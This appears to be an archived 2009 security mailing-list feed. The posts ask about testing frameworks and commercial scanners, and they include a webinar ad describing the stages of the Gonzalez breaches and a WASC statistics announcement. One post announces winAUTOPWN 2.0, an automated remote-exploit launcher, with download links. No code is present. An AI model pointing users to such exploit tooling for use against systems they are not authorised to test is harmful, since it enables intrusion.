	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&amp;nbsp;
&lt;br&gt;Hello Marat,
&lt;br&gt;&lt;br&gt;&lt;br&gt;Looking around the links that you posted, in this case, talking about
&lt;br&gt;the SANS Top25, mostly of those are related to Web, at least, the
&lt;br&gt;concept, for example: CWE-285: Improper Access Control
&lt;br&gt;(Authorization). I'm not sure exactly what you mean by assessing
&lt;br&gt;complex apps in a non-scripting language. I figured out that some apps
&lt;br&gt;that applies to your question it's more focused on RE / Vulnerability
&lt;br&gt;discovery tasks, like for example an ftp server in which you could
&lt;br&gt;perform security assessment with Fuzzing apps like TAOF (The Art of
&lt;br&gt;Fuzzing) which looks for Stack/Heap/String/Integer overflows, at the
&lt;br&gt;end in this case, you are doing &amp;quot;security&amp;quot; based testing.
&lt;br&gt;&lt;br&gt;I know that one of the best testing guidelines for non-web apps is the
&lt;br&gt;ISSAF [www.oissg.org/issaf] which I highly recommend you to take a look.
&lt;br&gt;&lt;br&gt;Hope I cleared your doubt.
&lt;br&gt;&lt;br&gt;chr1x &amp;nbsp;**
&lt;br&gt;&lt;br&gt;- --
&lt;br&gt;- ---
&lt;br&gt;[CubilFelino Security Research Lab - &lt;a href=&quot;http://chr1x.sectester.net&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://chr1x.sectester.net&lt;/a&gt;&amp;nbsp;]
&lt;br&gt;&amp;quot;The computer security is an art form. It's the ultimate martial art.&amp;quot;
&lt;br&gt;&lt;br&gt;&lt;br&gt;Marat VYSHEGORODTSEV escribió:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; Hello, web security researchers!
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; There is well known methodology for auditing security of web
&lt;br&gt;&amp;gt; applications called OWASP Testing Guide [0], but it describes testing
&lt;br&gt;&amp;gt; procedures for only web applications, not for, like, complex
&lt;br&gt;&amp;gt; applications (for example, containing application servers, application
&lt;br&gt;&amp;gt; gateways and so on) usually written in C#, C++, Delphi or any other
&lt;br&gt;&amp;gt; non-scripting language. Would you, folks, recommend such a framework
&lt;br&gt;&amp;gt; for testing complex not-web-only-applications?
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; I know only one approach from SANS [1] (Top25, CWE classification and
&lt;br&gt;&amp;gt; risk assessment), but it doesn't provide comprehensive methodology
&lt;br&gt;&amp;gt; like OWASP does. Basically I want to fill a gap between risk and
&lt;br&gt;&amp;gt; vulnerability assessment jobs and I'm looking for generally recognized
&lt;br&gt;&amp;gt; approach.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; [0] &lt;a href=&quot;http://www.owasp.org/index.php/Category:OWASP_Testing_Project&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.owasp.org/index.php/Category:OWASP_Testing_Project&lt;/a&gt;&lt;br&gt;&amp;gt; [1] &lt;a href=&quot;http://www.sans.org/top25-programming-errors/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sans.org/top25-programming-errors/&lt;/a&gt;&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Sincerely, Marat Vyshegorodtsev
&lt;br&gt;&amp;gt; Assessment specialist
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; This list is sponsored by Cenzic
&lt;br&gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt; Let Us Hack You. Before Hackers Do!
&lt;br&gt;&amp;gt; It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;&amp;gt; Request Yours Now!
&lt;br&gt;&amp;gt; &lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.9 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org/&lt;/a&gt;&lt;br&gt;&amp;nbsp;
&lt;br&gt;iQEcBAEBAgAGBQJLEp0IAAoJEENUkd83ZfT49lgH/1TcCdJEzeAjhRcRXrV233gT
&lt;br&gt;139XqC5sJw/n4FtVLvxBGtCPO4ZZlo5MHET+fumyVJ6plhHX/H81LTl+XJGh8h+s
&lt;br&gt;8bN4lwL9zNGUayG2Rfjveme8Kj8uo3PLfQeyFyIsQKCqckw8oxepNTJKmDgKAJT+
&lt;br&gt;n2gxprxzGPOX8joW0h9asoXLE1sa9ad5whThukcgRYU8FTMyYoA4q3Nlg02MUNwH
&lt;br&gt;oEgX2qSamrL4Uo091yztg3ug4NUd4Ox/1YymgvStpn4zB5aZbwbaQNnkBxf/Zcgl
&lt;br&gt;Po0PdcMYLBj5CTIOsXQ0PO/AWpvKwjpEcW2JYZxhaCsnxcKn6QvSgSCZV17PK3s=
&lt;br&gt;=lKzV
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Complex-applications-security-testing-framework-tp26560305p26566812.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26560305</id>
	<title>Complex applications security testing framework</title>
	<published>2009-11-28T13:47:19Z</published>
	<updated>2009-11-28T13:47:19Z</updated>
	<author>
		<name>Marat Vyshegorodtsev</name>
	</author>
	<content type="html">Hello, web security researchers!
&lt;br&gt;&lt;br&gt;There is well known methodology for auditing security of web
&lt;br&gt;applications called OWASP Testing Guide [0], but it describes testing
&lt;br&gt;procedures for only web applications, not for, like, complex
&lt;br&gt;applications (for example, containing application servers, application
&lt;br&gt;gateways and so on) usually written in C#, C++, Delphi or any other
&lt;br&gt;non-scripting language. Would you, folks, recommend such a framework
&lt;br&gt;for testing complex not-web-only-applications?
&lt;br&gt;&lt;br&gt;I know only one approach from SANS [1] (Top25, CWE classification and
&lt;br&gt;risk assessment), but it doesn't provide comprehensive methodology
&lt;br&gt;like OWASP does. Basically I want to fill a gap between risk and
&lt;br&gt;vulnerability assessment jobs and I'm looking for generally recognized
&lt;br&gt;approach.
&lt;br&gt;&lt;br&gt;[0] &lt;a href=&quot;http://www.owasp.org/index.php/Category:OWASP_Testing_Project&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.owasp.org/index.php/Category:OWASP_Testing_Project&lt;/a&gt;&lt;br&gt;[1] &lt;a href=&quot;http://www.sans.org/top25-programming-errors/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sans.org/top25-programming-errors/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Sincerely, Marat Vyshegorodtsev
&lt;br&gt;Assessment specialist
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Complex-applications-security-testing-framework-tp26560305p26560305.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26535511</id>
	<title>Re: out of box scanner</title>
	<published>2009-11-26T09:17:21Z</published>
	<updated>2009-11-26T09:17:21Z</updated>
	<author>
		<name>Brian Shura</name>
	</author>
	<content type="html">The Web Application Security Scanner Evaluation Criteria provides 
&lt;br&gt;guidance on features that should be considered when evaluating scanners 
&lt;br&gt;and advice on conducting an evaluation. &amp;nbsp;I agree with Jon that obtaining 
&lt;br&gt;evaluation licenses for these scanners and running them against a sample 
&lt;br&gt;of your actual web applications will give you the best idea of which 
&lt;br&gt;product best meets your needs.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Criteria&lt;/a&gt;&amp;nbsp;
&lt;br&gt;&lt;br&gt;&lt;br&gt;Brian
&lt;br&gt;&lt;br&gt;Jon Kibler wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; -----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;&amp;gt; Hash: SHA1
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; John Bennett wrote:
&lt;br&gt;&amp;gt; &amp;nbsp; 
&lt;br&gt;&amp;gt;&amp;gt; I'm currently evaluating some commercial scanners and wanted to get a
&lt;br&gt;&amp;gt;&amp;gt; feel for others experiences with appscan/cenzic/webinspect. &amp;nbsp;Any
&lt;br&gt;&amp;gt;&amp;gt; gotcha's with any of these products and can anybody recommend one over
&lt;br&gt;&amp;gt;&amp;gt; the other?
&lt;br&gt;&amp;gt;&amp;gt; thanks,
&lt;br&gt;&amp;gt;&amp;gt; John
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Do a fly-off in your environment. Each will give you 15-day demos. Run the demos
&lt;br&gt;&amp;gt; concurrently so that you can compare and contrast results. If a scanner vastly
&lt;br&gt;&amp;gt; under-preforms one of the competitors, contact their tech reps because you most
&lt;br&gt;&amp;gt; likely have something misconfigured.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Pick the scanner that finds the most non-false positives that the other scanners
&lt;br&gt;&amp;gt; miss, has the least false negatives, best fits your working environment, and
&lt;br&gt;&amp;gt; best integrates with other tools that you may be using.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; In two recent fly-offs with my clients, one vendor has consistently
&lt;br&gt;&amp;gt; out-performed the competition -- and I was stunned to have found that was the
&lt;br&gt;&amp;gt; case -- but, I do not want to prejudice your opinions by saying who. However, I
&lt;br&gt;&amp;gt; would be interested in hearing who you choose and why.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Best wishes,
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Jon Kibler
&lt;br&gt;&amp;gt; - --
&lt;br&gt;&amp;gt; Jon R. Kibler
&lt;br&gt;&amp;gt; Chief Technical Officer
&lt;br&gt;&amp;gt; Advanced Systems Engineering Technology, Inc.
&lt;br&gt;&amp;gt; Charleston, SC &amp;nbsp;USA
&lt;br&gt;&amp;gt; o: 843-849-8214
&lt;br&gt;&amp;gt; c: 843-813-2924
&lt;br&gt;&amp;gt; s: 843-564-4224
&lt;br&gt;&amp;gt; s: JonRKibler
&lt;br&gt;&amp;gt; e: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26535511&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;Jon.Kibler@...&lt;/a&gt;
&lt;br&gt;&amp;gt; e: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26535511&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;Jon.R.Kibler@...&lt;/a&gt;
&lt;br&gt;&amp;gt; &lt;a href=&quot;http://www.linkedin.com/in/jonrkibler&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.linkedin.com/in/jonrkibler&lt;/a&gt;&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; My PGP Fingerprint is:
&lt;br&gt;&amp;gt; BAA2 1F2C 5543 5D25 4636 A392 515C 5045 CF39 4253
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; -----BEGIN PGP SIGNATURE-----
&lt;br&gt;&amp;gt; Version: GnuPG v1.4.8 (Darwin)
&lt;br&gt;&amp;gt; Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org/&lt;/a&gt;&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; iEYEARECAAYFAksOQU4ACgkQUVxQRc85QlM3DQCfZR9ciYZnxhMR6ANMDxr4MTi6
&lt;br&gt;&amp;gt; X90Anje4KqXYrD6TFL6JlTK2B8NyLHHv
&lt;br&gt;&amp;gt; =lvjN
&lt;br&gt;&amp;gt; -----END PGP SIGNATURE-----
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; This list is sponsored by Cenzic
&lt;br&gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt; Let Us Hack You. Before Hackers Do!
&lt;br&gt;&amp;gt; It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;&amp;gt; Request Yours Now! 
&lt;br&gt;&amp;gt; &lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; &amp;nbsp; 
&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/out-of-box-scanner-tp26524937p26535511.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26526792</id>
	<title>Re: out of box scanner</title>
	<published>2009-11-26T00:50:23Z</published>
	<updated>2009-11-26T00:50:23Z</updated>
	<author>
		<name>Jon Kibler-2</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;John Bennett wrote:
&lt;br&gt;&amp;gt; I'm currently evaluating some commercial scanners and wanted to get a
&lt;br&gt;&amp;gt; feel for others experiences with appscan/cenzic/webinspect. &amp;nbsp;Any
&lt;br&gt;&amp;gt; gotcha's with any of these products and can anybody recommend one over
&lt;br&gt;&amp;gt; the other?
&lt;br&gt;&amp;gt; thanks,
&lt;br&gt;&amp;gt; John
&lt;br&gt;&amp;gt; 
&lt;br&gt;&lt;br&gt;Do a fly-off in your environment. Each will give you 15-day demos. Run the demos
&lt;br&gt;concurrently so that you can compare and contrast results. If a scanner vastly
&lt;br&gt;under-preforms one of the competitors, contact their tech reps because you most
&lt;br&gt;likely have something misconfigured.
&lt;br&gt;&lt;br&gt;Pick the scanner that finds the most non-false positives that the other scanners
&lt;br&gt;miss, has the least false negatives, best fits your working environment, and
&lt;br&gt;best integrates with other tools that you may be using.
&lt;br&gt;&lt;br&gt;In two recent fly-offs with my clients, one vendor has consistently
&lt;br&gt;out-performed the competition -- and I was stunned to have found that was the
&lt;br&gt;case -- but, I do not want to prejudice your opinions by saying who. However, I
&lt;br&gt;would be interested in hearing who you choose and why.
&lt;br&gt;&lt;br&gt;Best wishes,
&lt;br&gt;&lt;br&gt;Jon Kibler
&lt;br&gt;- --
&lt;br&gt;Jon R. Kibler
&lt;br&gt;Chief Technical Officer
&lt;br&gt;Advanced Systems Engineering Technology, Inc.
&lt;br&gt;Charleston, SC &amp;nbsp;USA
&lt;br&gt;o: 843-849-8214
&lt;br&gt;c: 843-813-2924
&lt;br&gt;s: 843-564-4224
&lt;br&gt;s: JonRKibler
&lt;br&gt;e: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26526792&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;Jon.Kibler@...&lt;/a&gt;
&lt;br&gt;e: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26526792&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;Jon.R.Kibler@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.linkedin.com/in/jonrkibler&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.linkedin.com/in/jonrkibler&lt;/a&gt;&lt;br&gt;&lt;br&gt;My PGP Fingerprint is:
&lt;br&gt;BAA2 1F2C 5543 5D25 4636 A392 515C 5045 CF39 4253
&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.8 (Darwin)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org/&lt;/a&gt;&lt;br&gt;&lt;br&gt;iEYEARECAAYFAksOQU4ACgkQUVxQRc85QlM3DQCfZR9ciYZnxhMR6ANMDxr4MTi6
&lt;br&gt;X90Anje4KqXYrD6TFL6JlTK2B8NyLHHv
&lt;br&gt;=lvjN
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/out-of-box-scanner-tp26524937p26526792.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26524937</id>
	<title>out of box scanner</title>
	<published>2009-11-25T08:15:27Z</published>
	<updated>2009-11-25T08:15:27Z</updated>
	<author>
		<name>John Bennett-3</name>
	</author>
	<content type="html">I'm currently evaluating some commercial scanners and wanted to get a 
&lt;br&gt;feel for others experiences with appscan/cenzic/webinspect. &amp;nbsp;Any 
&lt;br&gt;gotcha's with any of these products and can anybody recommend one over 
&lt;br&gt;the other? 
&lt;br&gt;&lt;br&gt;thanks,
&lt;br&gt;John
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/out-of-box-scanner-tp26524937p26524937.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26452439</id>
	<title>Replicating the Gonzalez Cyber Attacks through Penetration Testing</title>
	<published>2009-11-20T16:07:11Z</published>
	<updated>2009-11-20T16:07:11Z</updated>
	<author>
		<name>Norwich University</name>
	</author>
	<content type="html">--------------------------------------------------------------------------------
&lt;br&gt;YOU'RE INVITED: IT SECURITY ON DEMAND WEBCAST
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;quot;Replicating the Gonzalez Cyber Attacks through Penetration Testing&amp;quot;
&lt;br&gt;Register: &lt;a href=&quot;http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez&lt;/a&gt;&lt;br&gt;---------------------------------------------------------------------------------
&lt;br&gt;&amp;nbsp;
&lt;br&gt;Recently, we saw the indictment of cybercrime kingpin Albert Gonzalez, one of the accused masterminds behind high-profile data breaches at Heartland Payment Systems, Hannaford Bros. Supermarkets, 7-Eleven, and TJX. Next week, Core Security Technologies will present a hands-on look at the attacks Gonzalez and his co-conspirators are believed to have used in breaching these organizations.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;Leveraging the actual indictment document as a guide, Core Security senior product manager Alex Horan will use CORE IMPACT Pro penetration testing software to demonstrate the techniques by which Gonzales allegedly stole millions of credit card numbers* - showing you how to identify IT exposures in your own environment before cybercriminals do.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;gt; Register here: &lt;a href=&quot;http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez&lt;/a&gt;&lt;br&gt;&amp;nbsp;
&lt;br&gt;During the webcast, you'll see a step-by-step depiction of an attack similar to that described in the Gonzalez indictment, including the following critical stages:
&lt;br&gt;&amp;nbsp;
&lt;br&gt;* &amp;nbsp;the initial web application compromise via SQL Injection
&lt;br&gt;* &amp;nbsp;the use of a well-known backend database command to make the attacks even
&lt;br&gt;* &amp;nbsp;more invasive
&lt;br&gt;* &amp;nbsp;the planting of malware on the backend database server
&lt;br&gt;* &amp;nbsp;the collection and transmission of credit card transactions to the
&lt;br&gt;* &amp;nbsp;attackers
&lt;br&gt;&amp;nbsp;
&lt;br&gt;Through the demonstration, you'll also learn how commercial-grade penetration testing software enables you to see your IT systems as an attacker would -- not only by determining if the kinds of issues that Gonzalez reportedly leveraged are present in your environment, but also by ...
&lt;br&gt;&amp;nbsp;
&lt;br&gt;* &amp;nbsp;assessing how deployed defenses react to specific threats
&lt;br&gt;* &amp;nbsp;revealing what systems and data would be exposed by a breach
&lt;br&gt;* &amp;nbsp;depicting how chains of vulnerabilities open paths to mission-critical
&lt;br&gt;* &amp;nbsp;systems and information
&lt;br&gt;* &amp;nbsp;providing actionable data for immediately mitigating critical exposures
&lt;br&gt;* &amp;nbsp;repeating tests to ensure the effectiveness of remediation efforts
&lt;br&gt;&amp;nbsp;
&lt;br&gt;This webcast is ideal for anyone interested in proactively assessing their security posture against real-world cyber threats.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;gt; Register here: &lt;a href=&quot;http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/Form/generic/campaign/SecurityFocusGonzalez&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Replicating-the-Gonzalez-Cyber-Attacks-through-Penetration-Testing-tp26452439p26452439.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26187775</id>
	<title>winAUTOPWN 2.0 - Introducing winAUTOPWN GUI - Now you can sleep</title>
	<published>2009-11-03T10:02:59Z</published>
	<updated>2009-11-03T10:02:59Z</updated>
	<author>
		<name>QUAKER DOOMER</name>
	</author>
	<content type="html">Dear all,
&lt;br&gt;&lt;br&gt;After a long break and a lot of Unpolished SITA releases of the previous version,
&lt;br&gt;I am finally releasing winAUTOPWN version 2.0
&lt;br&gt;&lt;br&gt;winAUTOPWN or WINDOWS AUTOPWN version 2.0 now has a GUI (winAUTOPWN_GUI.exe) to initiate the main 
&lt;br&gt;console winAUTOPWN.exe
&lt;br&gt;winAUTOPWN now supports all console arguments which can also be fed interactively.
&lt;br&gt;This version covers almost all remote exploits from 2009 start uptill October 2009. Though a few are still missing 
&lt;br&gt;but they will be added shortly.
&lt;br&gt;&lt;br&gt;Daily/Weekly Snapshot/Beta Releases of winAUTOPWN are always available for download from WINAUTOPWN 
&lt;br&gt;website
&lt;br&gt;&lt;br&gt;&lt;br&gt;DOWNLOAD LINK : &lt;a href=&quot;http://089dc64a.seriousfiles.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://089dc64a.seriousfiles.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;Enjoy the Release.
&lt;br&gt;&lt;br&gt;&lt;br&gt;The Latest available release now is winAUTOPWN version 2.0
&lt;br&gt;&lt;br&gt;Coded by : Azim Poonawala (QUAKERDOOMER)
&lt;br&gt;&lt;br&gt;winAUTOPWN available at &lt;a href=&quot;http://winautopwn.co.nr&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://winautopwn.co.nr&lt;/a&gt;&lt;br&gt;&lt;br&gt;Author's website : &lt;a href=&quot;http://solidmecca.co.nr&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://solidmecca.co.nr&lt;/a&gt;&lt;br&gt;&lt;br&gt;winAUTOPWN is updated almost daily. Check the Download page for weekly 
&lt;br&gt;snapshots.
&lt;br&gt;Latest Release can always be downloaded from : &lt;a href=&quot;http://winautopwn.co.nr&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://winautopwn.co.nr&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;quot;winAUTOPWN - WINDOWS AUTOPWN (For The True HyperSomniac H-a-c-k-e-r-z-
&lt;br&gt;z-z-z-Z-Z)&amp;quot;
&lt;br&gt;&lt;br&gt;Regards,
&lt;br&gt;QUAKERDOOMER
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/winAUTOPWN-2.0---Introducing-winAUTOPWN-GUI---Now-you-can-sleep-tp26187775p26187775.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25933179</id>
	<title>WASC Announcement: 2008 Web Application Security Statistics Published</title>
	<published>2009-10-16T10:50:23Z</published>
	<updated>2009-10-16T10:50:23Z</updated>
	<author>
		<name>announcements-3</name>
	</author>
	<content type="html">&lt;br&gt;The Web Application Security Consortium (WASC) is pleased to announce
&lt;br&gt;the WASC Web Application Security Statistics Project 2008. This
&lt;br&gt;initiative is a collaborative industry wide effort to pool together
&lt;br&gt;sanitized website vulnerability data and to gain a better understanding
&lt;br&gt;about the web application vulnerability landscape.
&lt;br&gt;&lt;br&gt;The statistics was compiled from web application security assessment
&lt;br&gt;projects which were made by the following companies in 2008 (in
&lt;br&gt;alphabetic order):
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; * Blueinfy
&lt;br&gt;&amp;nbsp; &amp;nbsp; * Cenzic with Hailstorm
&lt;br&gt;&amp;nbsp; &amp;nbsp; * DNS with WebInspect
&lt;br&gt;&amp;nbsp; &amp;nbsp; * Encription Limited
&lt;br&gt;&amp;nbsp; &amp;nbsp; * HP Application Security Center with WebInspect
&lt;br&gt;&amp;nbsp; &amp;nbsp; * Positive Technologies with MaxPatrol
&lt;br&gt;&amp;nbsp; &amp;nbsp; * Veracode with Veracode Security Review
&lt;br&gt;&amp;nbsp; &amp;nbsp; * WhiteHat Security with WhiteHat Sentinel
&lt;br&gt;&lt;br&gt;The statistics includes data about 12186 sites with 97554 detected
&lt;br&gt;vulnerabilities.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://projects.webappsec.org/Web-Application-Security-Statistics&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://projects.webappsec.org/Web-Application-Security-Statistics&lt;/a&gt;&lt;br&gt;&lt;br&gt;If you represent an organization that performs vulnerability assessments
&lt;br&gt;on websites, particular in those in custom web applications, through a
